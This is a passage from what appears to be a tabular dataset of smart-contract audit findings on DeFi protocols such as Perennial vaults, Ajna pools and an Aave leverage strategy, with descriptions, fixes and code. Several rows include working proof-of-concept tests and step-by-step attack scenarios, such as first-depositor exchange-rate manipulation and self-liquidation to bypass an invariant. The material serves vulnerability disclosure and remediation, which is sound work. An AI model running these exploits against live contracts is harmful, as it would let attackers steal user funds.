'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe deadline check ensure that the transaction can be executed on time and the expired transaction revert.","consider adding deadline check like in the functions like withdraw and deposit and all operations the point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n","The transaction can be pending in mempool for a long and the trading activity is very time senstive. Without deadline check, the trade transaction can be executed in a long time after the user submit the transaction, at that time, the trade can be done in a sub-optimal price, which harms user's position.\\nThe deadline check ensure that the transaction can be executed on time and the expired transaction revert.","```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = 
(amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n" +Lenders lose interests and pay deposit fees due to no slippage control,medium,"When a lender deposits quote tokens below the minimum of LUP(Lowest Utilization Price) and HTP(Highest Threshold Price), the deposits will not earn interest and will also be charged deposit fees, according to docs. When a lender deposits to a bucket, they are vulnerable to pool LUP slippage which might cause them to lose funds due to fee charges against their will.\\nA lender would call `addQuoteToken()` to deposit. 
This function only allows entering expiration time for transaction settlement, but there is no slippage protection.\\n```\\n//Pool.sol\\n function addQuoteToken(\\n uint256 amount_,\\n uint256 index_,\\n uint256 expiry_\\n ) external override nonReentrant returns (uint256 bucketLP_) {\\n _revertAfterExpiry(expiry_);\\n PoolState memory poolState = _accruePoolInterest();\\n // round to token precision\\n amount_ = _roundToScale(amount_, poolState.quoteTokenScale);\\n uint256 newLup;\\n (bucketLP_, newLup) = LenderActions.addQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n AddQuoteParams({\\n amount: amount_,\\n index: index_\\n })\\n );\\n // rest of code\\n```\\n\\nIn LenderActions.sol, `addQuoteToken()` takes current `DepositsState` in storage and current `poolState_.debt` in storage to calculate spot LUP prior to deposit. And this LUP is compared with user input bucket `index_` to determine if the lender will be punished with deposit fees. The deposit amount is then written to storage.\\n```\\n//LenderActions.sol\\n function addQuoteToken(\\n mapping(uint256 => Bucket) storage buckets_,\\n DepositsState storage deposits_,\\n PoolState calldata poolState_,\\n AddQuoteParams calldata params_\\n ) external returns (uint256 bucketLP_, uint256 lup_) {\\n // rest of code\\n // charge unutilized deposit fee where appropriate\\n |> uint256 lupIndex = Deposits.findIndexOfSum(deposits_, poolState_.debt);\\n bool depositBelowLup = lupIndex != 0 && params_.index > lupIndex;\\n if (depositBelowLup) {\\n addedAmount = Maths.wmul(addedAmount, Maths.WAD - _depositFeeRate(poolState_.rate));\\n }\\n// rest of code\\n Deposits.unscaledAdd(deposits_, params_.index, unscaledAmount);\\n// rest of code\\n```\\n\\nIt should be noted that current `deposits_` and `poolState_.debt` can be different from when the user invoked the transaction, which will result in a different LUP spot price unforeseen by the lender to determine deposit fees. 
Even though lenders can input a reasonable expiration time `expirty_`, this will only prevent stale transactions to be executed and not offer any slippage control.\\nWhen there are many lenders depositing around the same time, LUP spot price can be increased and if the user transaction settles after a whale lender which moves the LUP spot price up significantly, the user might get accidentally punished for depositing below LUP. Or there could also be malicious lenders trying to ensure their transactions settle at a favorable LUP/HTP and front-run the user transaction, in which case the user transaction might still settle after the malicious lender and potentially get charged for fees.","Add slippage protection in Pool.sol `addQuoteToken()`. A lender can enable slippage protection, which will enable comparing deposit `index_` with `lupIndex` in LenderActions.sol.","Lenders might get charged deposit fees due to slippage against their will with or without MEV attacks, lenders might also lose on interest by depositing below HTP.","```\\n//Pool.sol\\n function addQuoteToken(\\n uint256 amount_,\\n uint256 index_,\\n uint256 expiry_\\n ) external override nonReentrant returns (uint256 bucketLP_) {\\n _revertAfterExpiry(expiry_);\\n PoolState memory poolState = _accruePoolInterest();\\n // round to token precision\\n amount_ = _roundToScale(amount_, poolState.quoteTokenScale);\\n uint256 newLup;\\n (bucketLP_, newLup) = LenderActions.addQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n AddQuoteParams({\\n amount: amount_,\\n index: index_\\n })\\n );\\n // rest of code\\n```\\n" +BalancedVault.sol: loss of funds + global settlement flywheel / user settlement flywheels getting out of sync,high,"When an epoch has become ""stale"", the `BalancedVault` will treat any new deposits and redemptions in this epoch as ""pending"". 
This means they won't get processed by the global settlement flywheel in the next epoch but one epoch later than that.\\nDue to the fact that anyone can push a pending deposit or redemption of a user further ahead by making an arbitrarily small deposit in the ""intermediate epoch"" (i.e. the epoch between when the user creates the pending deposit / redemption and the epoch when it is scheduled to be processed by the global settlement flywheel), the user can experience a DOS.\\nWorse than that, by pushing the pending deposit / pending redemption further ahead, the global settlement flywheel and the user settlement flywheel get out of sync.\\nAlso users can experience a loss of funds.\\nSo far so good. The global settlement flywheel and the user settlement flywheel are in sync and will process the pending deposit in epoch `3`.\\nNow here's the issue. A malicious user2 or user1 unknowingly (depending on the specific scenario) calls `deposit` for user1 again in the current epoch `2` once it has become `stale` (it's possible to `deposit` an arbitrarily small amount). By doing so we set `_pendingEpochs[user1] = context.epoch + 1 = 3`, thereby pushing the processing of the `deposit` in the user settlement flywheel one epoch ahead.\\nIt's important to understand that the initial deposit will still be processed in epoch `3` in the global settlement flywheel, it's just being pushed ahead in the user settlement flywheel.\\nThereby the global settlement flywheel and user settlement flywheel are out of sync now.\\nAn example for a loss of funds that can occur as a result of this issue is when the PnL from epoch `3` to epoch `4` is positive. 
Thereby the user1 will get less shares than he is entitled to.\\nSimilarly it is possible to push pending redemptions ahead, thereby the `_totalUnclaimed` amount would be increased by an amount that is different from the amount that `_unclaimed[account]` is increased by.\\nComing back to the case with the pending deposit, I wrote a test that you can add to BalancedVaultMulti.test.ts:\\n```\\nit('pending deposit pushed by 1 epoch causing shares difference', async () => {\\n const smallDeposit = utils.parseEther('1000')\\n const smallestDeposit = utils.parseEther('0.000001')\\n\\n await updateOracleEth() // epoch now stale\\n // make a pending deposit\\n await vault.connect(user).deposit(smallDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracleEth() // epoch now stale\\n /* \\n user2 deposits for user1, thereby pushing the pending deposit ahead and causing the \\n global settlement flywheel and user settlement flywheel to get out of sync\\n */\\n await vault.connect(user2).deposit(smallestDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracle()\\n // pending deposit for user1 is now processed in the user settlement flywheel\\n await vault.syncAccount(user.address)\\n\\n const totalSupply = await vault.totalSupply()\\n const balanceUser1 = await vault.balanceOf(user.address)\\n const balanceUser2 = await vault.balanceOf(user2.address)\\n\\n /*\\n totalSupply is bigger than the amount of shares of both users together\\n this is because user1 loses out on some shares that he is entitled to\\n -> loss of funds\\n */\\n console.log(totalSupply);\\n console.log(balanceUser1.add(balanceUser2));\\n\\n})\\n```\\n\\nThe impact that is generated by having one pending deposit that is off by one epoch is small. 
However over time this would evolve into a chaotic situation, where the state of the Vault is significantly corrupted.",My recommendation is to implement a queue for pending deposits / pending redemptions of a user. Pending deposits / redemptions can then be processed independently (without new pending deposits / redemptions affecting when existing ones are processed).\\nPossibly there is a simpler solution which might involve restricting the ability to make deposits to the user himself and only allowing one pending deposit / redemption to exist at a time.\\nThe solution to implement depends on how flexible the sponsor wants the deposit / redemption functionality to be.,"The biggest impact comes from the global settlement flywheel and user settlement flywheel getting out of sync. As shown above, this can lead to a direct loss of funds for the user (e.g. the amount of shares he gets for a deposit are calculated with the wrong context).\\nApart from the direct impact for a single user, there is a subtler impact which can be more severe in the long term. Important invariants are violated:\\nSum of user balances is equal to the total supply\\nSum of unclaimed user assets is equal to total unclaimed assets\\nThereby the impact is not limited to a single user but affects the calculations for all users.\\nLess important but still noteworthy is that users that deposit into the Vault are partially exposed to PnL in the underlying products. The Vault does not employ a fully delta-neutral strategy. 
Therefore by experiencing a larger delay until the pending deposit / redemption is processed, users incur the risk of negative PnL.","```\\nit('pending deposit pushed by 1 epoch causing shares difference', async () => {\\n const smallDeposit = utils.parseEther('1000')\\n const smallestDeposit = utils.parseEther('0.000001')\\n\\n await updateOracleEth() // epoch now stale\\n // make a pending deposit\\n await vault.connect(user).deposit(smallDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracleEth() // epoch now stale\\n /* \\n user2 deposits for user1, thereby pushing the pending deposit ahead and causing the \\n global settlement flywheel and user settlement flywheel to get out of sync\\n */\\n await vault.connect(user2).deposit(smallestDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracle()\\n // pending deposit for user1 is now processed in the user settlement flywheel\\n await vault.syncAccount(user.address)\\n\\n const totalSupply = await vault.totalSupply()\\n const balanceUser1 = await vault.balanceOf(user.address)\\n const balanceUser2 = await vault.balanceOf(user2.address)\\n\\n /*\\n totalSupply is bigger than the amount of shares of both users together\\n this is because user1 loses out on some shares that he is entitled to\\n -> loss of funds\\n */\\n console.log(totalSupply);\\n console.log(balanceUser1.add(balanceUser2));\\n\\n})\\n```\\n" +ChainlinkAggregator: binary search for roundId does not work correctly and Oracle can even end up temporarily DOSed,medium,"When a phase switchover occurs, it can be necessary that phases need to be searched for a `roundId` with a timestamp as close as possible but bigger than `targetTimestamp`.\\nFinding the `roundId` with the closest possible timestamp is necessary according to the sponsor to minimize the delay of position changes:\\n\\nThe binary search algorithm is not able to find this best `roundId` which thereby causes 
unintended position changes.\\nAlso it can occur that the `ChainlinkAggregator` library is unable to find a valid `roundId` at all (as opposed to only not finding the ""best"").\\nThis would cause the Oracle to be temporarily DOSed until there are more valid rounds.\\nLet's say in a phase there's only one valid round (roundId=1) and the timestamp for this round is greater than `targetTimestamp`\\nWe would expect the `roundId` that the binary search finds to be `roundId=1`.\\nThe binary search loop is executed with `minRoundId=1` and `maxRoundId=1001`.\\nAll the above conditions can easily occur in reality, they represent the basic scenario under which this algorithm executes.\\n`minRoundId` and `maxRoundId` change like this in the iterations of the loop:\\n```\\nminRoundId=1\\nmaxRoundId=1001\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=501\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=251\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=126\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=63\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=32\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=16\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=8\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=4\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=2\\n\\nNow the loop terminates because\\nminRoundId + 1 !< maxRoundId\\n```\\n\\nSince we assumed that `roundId=2` is invalid, the function returns `0` (maxTimestamp=type(uint256).max):\\nIn the case that `latestRound.roundId` is equal to the `roundId=1` (i.e. same phase and same round id which could not be found) there would be no other valid rounds that the `ChainlinkAggregator` can find which causes a temporary DOS.","I recommend to add a check if `minRoundId` is a valid solution for the binary search. 
If it is, `minRoundId` should be used to return the result instead of maxRoundId:\\n```\\n // If the found timestamp is not greater than target timestamp or no max was found, then the desired round does\\n // not exist in this phase\\n// Remove the line below\\n if (maxTimestamp <= targetTimestamp || maxTimestamp == type(uint256).max) return 0;\\n// Add the line below\\n if ((minTimestamp <= targetTimestamp || minTimestamp == type(uint256).max) && (maxTimestamp <= targetTimestamp || maxTimestamp == type(uint256).max)) return 0;\\n \\n// Add the line below\\n if (minTimestamp > targetTimestamp) {\\n// Add the line below\\n return _aggregatorRoundIdToProxyRoundId(phaseId, uint80(minRoundId));\\n// Add the line below\\n }\\n return _aggregatorRoundIdToProxyRoundId(phaseId, uint80(maxRoundId));\\n }\\n```\\n\\nAfter applying the changes, the binary search only returns `0` if both `minRoundId` and `maxRoundId` are not a valid result.\\nIf this line is passed we know that either of both is valid and we can use `minRoundId` if it is the better result.","As explained above this would result in sub-optimal and unintended position changes in the best case. In the worst-case the Oracle can be temporarily DOSed, unable to find a valid `roundId`.\\nThis means that users cannot interact with the perennial protocol because the Oracle cannot be synced. 
So they cannot close losing trades which is a loss of funds.",```\\nminRoundId=1\\nmaxRoundId=1001\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=501\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=251\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=126\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=63\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=32\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=16\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=8\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=4\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=2\\n\\nNow the loop terminates because\\nminRoundId + 1 !< maxRoundId\\n```\\n +BalancedVault.sol: Early depositor can manipulate exchange rate and steal funds,medium,"The first depositor can mint a very small number of shares, then donate assets to the Vault. Thereby he manipulates the exchange rate and later depositors lose funds due to rounding down in the number of shares they receive.\\nThe currently deployed Vaults already hold funds and will merely be upgraded to V2. However as Perennial expands there will surely be the need for more Vaults which enables this issue to occur.\\nYou can add the following test to `BalancedVaultMulti.test.ts`. Make sure to have the `dsu` variable available in the test since by default this variable is not exposed to the tests.\\nThe test is self-explanatory and contains the necessary comments:\\n```\\nit('exchange rate manipulation', async () => {\\n const smallDeposit = utils.parseEther('1')\\n const smallestDeposit = utils.parseEther('0.000000000000000001')\\n\\n // make a deposit with the attacker. Deposit 1 Wei to mint 1 Wei of shares\\n await vault.connect(user).deposit(smallestDeposit, user.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalSupply());\\n\\n // donating assets to Vault\\n await dsu.connect(user).transfer(vault.address, utils.parseEther('1'))\\n\\n console.log(await vault.totalAssets());\\n\\n // make a deposit with the victim. 
Due to rounding the victim will end up with 0 shares\\n await updateOracle();\\n await vault.sync()\\n await vault.connect(user2).deposit(smallDeposit, user2.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalAssets());\\n console.log(await vault.totalSupply());\\n // the amount of shares the victim receives is rounded down to 0\\n console.log(await vault.balanceOf(user2.address));\\n\\n /*\\n at this point there are 2000000000000000001 Wei of assets in the Vault and only 1 Wei of shares\\n which is owned by the attacker.\\n This means the attacker has stolen all funds from the victim.\\n */\\n })\\n```\\n",This issue can be mitigated by requiring a minimum deposit of assets. Thereby the attacker cannot manipulate the exchange rate to be so low as to enable this attack.,The attacker can steal funds from later depositors.,"```\\nit('exchange rate manipulation', async () => {\\n const smallDeposit = utils.parseEther('1')\\n const smallestDeposit = utils.parseEther('0.000000000000000001')\\n\\n // make a deposit with the attacker. Deposit 1 Wei to mint 1 Wei of shares\\n await vault.connect(user).deposit(smallestDeposit, user.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalSupply());\\n\\n // donating assets to Vault\\n await dsu.connect(user).transfer(vault.address, utils.parseEther('1'))\\n\\n console.log(await vault.totalAssets());\\n\\n // make a deposit with the victim. 
Due to rounding the victim will end up with 0 shares\\n await updateOracle();\\n await vault.sync()\\n await vault.connect(user2).deposit(smallDeposit, user2.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalAssets());\\n console.log(await vault.totalSupply());\\n // the amount of shares the victim receives is rounded down to 0\\n console.log(await vault.balanceOf(user2.address));\\n\\n /*\\n at this point there are 2000000000000000001 Wei of assets in the Vault and only 1 Wei of shares\\n which is owned by the attacker.\\n This means the attacker has stolen all funds from the victim.\\n */\\n })\\n```\\n" +User would liquidate his account to sidestep `takerInvariant` modifier,medium,"A single user could open a massive maker position, using the maximum leverage possible(and possibly reach the maker limit), and when a lot of takers open take positions, maker would liquidate his position, effectively bypassing the taker invariant and losing nothing apart from position fees. This would cause takers to be charged extremely high funding fees(at the maxRate), and takers that are not actively monitoring their positions will be greatly affected.\\nIn the closeMakeFor function, there is a modifier called `takerInvariant`.\\n```\\nfunction closeMakeFor(\\n address account,\\n UFixed18 amount\\n )\\n public\\n nonReentrant\\n notPaused\\n onlyAccountOrMultiInvoker(account)\\n settleForAccount(account)\\n takerInvariant\\n closeInvariant(account)\\n liquidationInvariant(account)\\n {\\n _closeMake(account, amount);\\n }\\n```\\n\\nThis modifier prevents makers from closing their positions if it would make the global maker open positions to fall below the global taker open positions. A malicious maker can easily sidestep this by liquidating his own account. 
Liquidating an account pays the liquidator a fee from the account's collateral, and then forcefully closes all open maker and taker positions for that account.\\n```\\nfunction closeAll(address account) external onlyCollateral notClosed settleForAccount(account) {\\n AccountPosition storage accountPosition = _positions[account];\\n Position memory p = accountPosition.position.next(_positions[account].pre);\\n\\n // Close all positions\\n _closeMake(account, p.maker);\\n _closeTake(account, p.taker);\\n\\n // Mark liquidation to lock position\\n accountPosition.liquidation = true; \\n }\\n```\\n\\nThis would make the open maker positions to drop significantly below the open taker position, and greatly increase the funding fee and utilization ratio.\\nATTACK SCENARIO\\nA new Product(ETH-Long) is launched on arbitrum with the following configurations:\\n20x max leverage(5% maintenance)\\nmakerFee = 0\\ntakerFee = 0.015\\nliquidationFee = 20%\\nminRate = 4%\\nmaxRate = 120%\\ntargetRate = 12%\\ntargetUtilization = 80%\\nmakerLimit = 4000 Eth\\nETH price = 1750 USD\\nColl Token = USDC\\nmax liquidity(USD) = 4000*1750 = $7,000,000\\nWhale initially supplies 350k USDC of collateral(~200ETH), and opens a maker position of 3000ETH($5.25mn), at 15x leverage.\\nAfter 2 weeks of activity, global open maker position goes up to 3429ETH($6mn), and because fundingFee is low, people are incentivized to open taker positions, so global open taker position gets to 2743ETH($4.8mn) at 80% utilization. Now, rate of fundingFee is 12%\\nNow, Whale should only be able to close up to 686ETH($1.2mn) of his maker position using the `closeMakeFor` function because of the `takerInvariant` modifier.\\nWhale decides to withdraw 87.5k USDC(~50ETH), bringing his total collateral to 262.5k USDC, and his leverage to 20x(which is the max leverage)\\nIf price of ETH temporarily goes up to 1755 USD, totalMaintenance=3000 * 1755 * 5% = $263250. 
Because his totalCollateral is 262500 USDC(which is less than totalMaintenance), his account becomes liquidatable.\\nWhale liquidates his account, he receives liquidationFee*totalMaintenance = 20% * 263250 = 52650USDC, and his maker position of 3000ETH gets closed. Now, he can withdraw his remaining collateral(262500-52650=209850)USDC because he has no open positions.\\nGlobal taker position is now 2743ETH($4.8mn), and global maker position is 429ETH($750k)\\nWhale has succeeded in bypassing the takerInvariant modifier, which was to prevent him from closing his maker position if it would make global maker position less than global taker position.\\nConsequently,\\nFunding fees would now be very high(120%), so the currently open taker positions will be greatly penalized, and takers who are not actively monitoring their position could lose a lot.\\nWhale would want to gain from the high funding fees, so he would open a maker position that would still keep the global maker position less than the global taker position(e.g. collateral of 232750USDC at 15x leverage, open position = ~2000ETH($3.5mn)) so that taker positions will keep getting charged at the funding fee maxRate.","Consider implementing any of these:\\nProtocol should receive a share of liquidation fee: This would disincentivize users from wanting to liquidate their own accounts, and they would want to keep their positions healthy and over-collateralized\\nLet there be a maker limit on each account: In addition to the global maker limit, there should be a maker limit for each account which may be capped at 5% of global maker limit. This would decentralize liquidity provisioning.","Issue User would liquidate his account to sidestep `takerInvariant` modifier\\nUser will close his maker position when he shouldn't be allowed to, and it would cause open taker positions to be greatly impacted. 
And those who are not actively monitoring their open taker positions will suffer loss due to high funding fees.","```\\nfunction closeMakeFor(\\n address account,\\n UFixed18 amount\\n )\\n public\\n nonReentrant\\n notPaused\\n onlyAccountOrMultiInvoker(account)\\n settleForAccount(account)\\n takerInvariant\\n closeInvariant(account)\\n liquidationInvariant(account)\\n {\\n _closeMake(account, amount);\\n }\\n```\\n" +Accounts will not be liquidated when they are meant to.,medium,"In the case that the totalMaintenance*liquidationFee is higher than the account's totalCollateral, liquidators are paid the totalCollateral. I think one of the reasons for this is to avoid the case where liquidating an account would attempt to debit fees that is greater than the collateral balance The problem is that, the value of totalCollateral used as fee is slightly higher value than the current collateral balance, which means that in such cases, attempts to liquidate the account would revert due to underflow errors.\\nHere is the `liquidate` function:\\n```\\nfunction liquidate(\\n address account,\\n IProduct product\\n ) external nonReentrant notPaused isProduct(product) settleForAccount(account, product) {\\n if (product.isLiquidating(account)) revert CollateralAccountLiquidatingError(account);\\n\\n UFixed18 totalMaintenance = product.maintenance(account); maintenance?\\n UFixed18 totalCollateral = collateral(account, product); \\n\\n if (!totalMaintenance.gt(totalCollateral))\\n revert CollateralCantLiquidate(totalMaintenance, totalCollateral);\\n\\n product.closeAll(account);\\n\\n // claim fee\\n UFixed18 liquidationFee = controller().liquidationFee();\\n \\n UFixed18 collateralForFee = UFixed18Lib.max(totalMaintenance, controller().minCollateral()); \\n UFixed18 fee = UFixed18Lib.min(totalCollateral, collateralForFee.mul(liquidationFee)); \\n\\n _products[product].debitAccount(account, fee); \\n token.push(msg.sender, fee);\\n\\n emit Liquidation(account, product, 
msg.sender, fee);\\n }\\n```\\n\\n`fee=min(totalCollateral,collateralForFee*liquidationFee)` But the PROBLEM is, the value of `totalCollateral` is fetched before calling `product.closeAll`, and `product.closeAll` debits the closePosition fee from the collateral balance. So there is an attempt to debit `totalCollateral`, when the current collateral balance of the account is totalCollateral-closePositionFees This allows the following:\\nThere is an ETH-long market with following configs:\\nmaintenance=5%\\nminCollateral=100USDC\\nliquidationFee=20%\\nETH price=$1000\\nUser uses 500USDC to open $10000(10ETH) position\\nPrice of ETH spikes up to $6000\\nRequired maintenance= 60000*5%=$3000 which is higher than account's collateral balance(500USDC), therefore account should be liquidated\\nA watcher attempts to liquidate the account which does the following:\\ntotalCollateral=500USDC\\n`product.closeAll` closes the position and debits a makerFee of 10USDC\\ncurrent collateral balance=490USDC\\ncollateralForFee=totalMaintenance=$3000\\nfee=min(500,3000*20%)=500\\n`_products[product].debitAccount(account,fee)` attempts to subtract 500 from 490 which would revert due to underflow\\naccount does not get liquidated\\nNow, User is not liquidated even when he is using 500USD to control a $60000 position at 120x leverage(whereas, maxLeverage=20x)\\nNOTE: This would happen when the market token's price increases by (1/liquidationFee)x. In the above example, price of ETH increased by 6x (from 1000USD to 6000USD) which is greater than 5(1/20%)",`totalCollateral` that would be paid to liquidator should be refetched after `product.closeAll` is called to get the current collateral balance after closePositionFees have been debited.,"A User's position will not be liquidated even when his collateral balance falls WELL below the required maintenance. 
I believe this is of HIGH impact because this scenario is very likely to happen, and when it does, the protocol will be greatly affected because a lot of users will be trading abnormally high leveraged positions without getting liquidated.","```\\nfunction liquidate(\\n address account,\\n IProduct product\\n ) external nonReentrant notPaused isProduct(product) settleForAccount(account, product) {\\n if (product.isLiquidating(account)) revert CollateralAccountLiquidatingError(account);\\n\\n UFixed18 totalMaintenance = product.maintenance(account); maintenance?\\n UFixed18 totalCollateral = collateral(account, product); \\n\\n if (!totalMaintenance.gt(totalCollateral))\\n revert CollateralCantLiquidate(totalMaintenance, totalCollateral);\\n\\n product.closeAll(account);\\n\\n // claim fee\\n UFixed18 liquidationFee = controller().liquidationFee();\\n \\n UFixed18 collateralForFee = UFixed18Lib.max(totalMaintenance, controller().minCollateral()); \\n UFixed18 fee = UFixed18Lib.min(totalCollateral, collateralForFee.mul(liquidationFee)); \\n\\n _products[product].debitAccount(account, fee); \\n token.push(msg.sender, fee);\\n\\n emit Liquidation(account, product, msg.sender, fee);\\n }\\n```\\n" +`BalancedVault` doesn't consider potential break in one of the markets,medium,"In case of critical failure of any of the underlying markets, making it permanently impossible to close position and withdraw collateral all funds deposited to balanced Vault will be lost, including funds deposited to other markets.\\nAs Markets and Vaults on Perennial are intented to be created in a permissionless manner and integrate with external price feeds, it cannot be ruled out that any Market will enter a state of catastrophic failure at a point in the future (i.e. 
oracle used stops functioning and Market admin keys are compromised, so it cannot be changed), resulting in permanent inability to process closing positions and withdrawing collateral.\\n`BalancedVault` does not consider this case, exposing all funds deposited to a multi-market Vault to an increased risk, as it is not implementing a possibility for users to withdraw deposited funds through a partial emergency withdrawal from other markets, even at a price of losing the claim to locked funds in case it becomes available in the future. This risk is not mentioned in the documentation.\\nProof of Concept\\nConsider a Vault with 2 markets: ETH/USD and ARB/USD.\\nAlice deposits to Vault, her funds are split between 2 markets\\nARB/USD market undergoes a fatal failure resulting in `maxAmount` returned from `_maxRedeemAtEpoch` to be 0\\nAlice cannot start withdrawal process as this line in `redeem` reverts:\\n```\\n if (shares.gt(_maxRedeemAtEpoch(context, accountContext, account))) revert BalancedVaultRedemptionLimitExceeded();\\n```\\n",Implement a partial/emergency withdrawal or acknowledge the risk clearly in Vault's documentation.,Users funds are exposed to increased risk compared to depositing to each market individually and in case of failure of any of the markets all funds are lost. User has no possibility to consciously cut losses and withdraw funds from Markets other than the failed one.,"```\\n if (shares.gt(_maxRedeemAtEpoch(context, accountContext, account))) revert BalancedVaultRedemptionLimitExceeded();\\n```\\n" +eMode implementation is completely broken,high,"Enabling eMode allows assets of the same class to be borrowed at much higher a much higher LTV. 
The issue is that the current implementation makes the incorrect calls to the Aave V3 pool making so that the pool can never take advantage of this higher LTV.\\nAaveLeverageStrategyExtension.sol#L1095-L1109\\n```\\nfunction _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n \\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n```\\n\\nWhen calculating the max borrow/repay allowed, the contract uses the getReserveConfigurationData subcall to the pool.\\nAaveProtocolDataProvider.sol#L77-L100\\n```\\nfunction getReserveConfigurationData(\\n address asset\\n)\\n external\\n view\\n override\\n returns (\\n // rest of code\\n )\\n{\\n DataTypes.ReserveConfigurationMap memory configuration = IPool(ADDRESSES_PROVIDER.getPool())\\n .getConfiguration(asset);\\n\\n (ltv, liquidationThreshold, liquidationBonus, decimals, reserveFactor, ) = configuration\\n .getParams();\\n```\\n\\nThe issue with using getReserveConfigurationData is that it always returns the default settings of the pool. It never returns the adjusted eMode settings. 
This means that no matter the eMode status of the set token, it will never be able to borrow to that limit due to calling the incorrect function.\nIt is also worth considering that the set token's as well as other integrated modules' configurations/settings would assume this higher LTV. Due to this mismatch, the set token would almost certainly be misconfigured, which would lead to highly dangerous/erratic behavior from both the set and its integrated modules. Due to this I believe that a high severity is appropriate.",Pull the adjusted eMode settings rather than the base pool settings,"Usage of eMode, a core function of the contracts, is completely unusable causing erratic/dangerous behavior","```\nfunction _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\n \n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\n\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\n // for example ETH has an LTV value of 8000 which represents 80%\n if (_isLever) {\n uint256 netBorrowLimit = _actionInfo.collateralValue\n .preciseMul(maxLtvRaw.mul(10 ** 14))\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\n\n return netBorrowLimit\n .sub(_actionInfo.borrowValue)\n .preciseDiv(_actionInfo.collateralPrice);\n```\n" +_calculateMaxBorrowCollateral calculates repay incorrectly and can lead to set token liquidation,high,"When calculating the amount to repay, `_calculateMaxBorrowCollateral` incorrectly applies `unutilizedLeveragePercentage` when calculating `netRepayLimit`. 
